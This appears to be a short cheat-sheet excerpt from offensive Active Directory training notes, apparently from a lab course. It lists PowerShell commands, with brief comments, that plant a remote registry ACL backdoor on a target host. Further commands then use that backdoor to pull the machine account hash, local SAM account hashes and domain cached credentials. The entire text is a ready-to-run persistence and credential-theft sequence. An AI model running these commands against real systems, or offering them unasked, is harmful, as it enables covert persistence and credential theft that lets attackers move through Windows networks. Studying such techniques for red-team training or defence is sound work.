# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.Add-RemoteRegBackdoor-ComputerName<remotehost>-Trusteestudent1-Verbose# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.Get-RemoteMachineAccountHash-ComputerName<remotehost>-Verbose# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.Get-RemoteLocalAccountHash-ComputerName<remotehost>-Verbose# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.Get-RemoteCachedCredential-ComputerName<remotehost>-Verbose